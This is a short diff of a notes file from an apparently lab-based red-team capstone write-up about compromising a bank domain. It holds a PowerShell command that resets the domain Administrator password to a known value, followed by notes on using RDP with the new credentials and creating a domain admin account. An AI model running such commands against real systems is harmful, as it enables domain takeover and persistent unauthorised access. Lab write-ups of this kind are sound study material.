kairosart/Red-Team-Capstone-Challenge/FULL COMPROMISE OF BANK DOMAIN/Authenticate with BANKDC.BANK.THERESERVE.LOC from host CORPDC.md

 C:\Windows\system32>`powershell.exe -c Set-ADAccountPassword -Identity "Administrator" -NewPassword (ConvertTo-SecureString -AsPlainText "Hacker@123" -Force) -Reset`

-rdp into ROOTDC with the new creds.. created a domain admin user for BankDC.
+Rdp into ROOTDC with the new creds.. created a domain admin user for BankDC.
 Rdp into BankDC.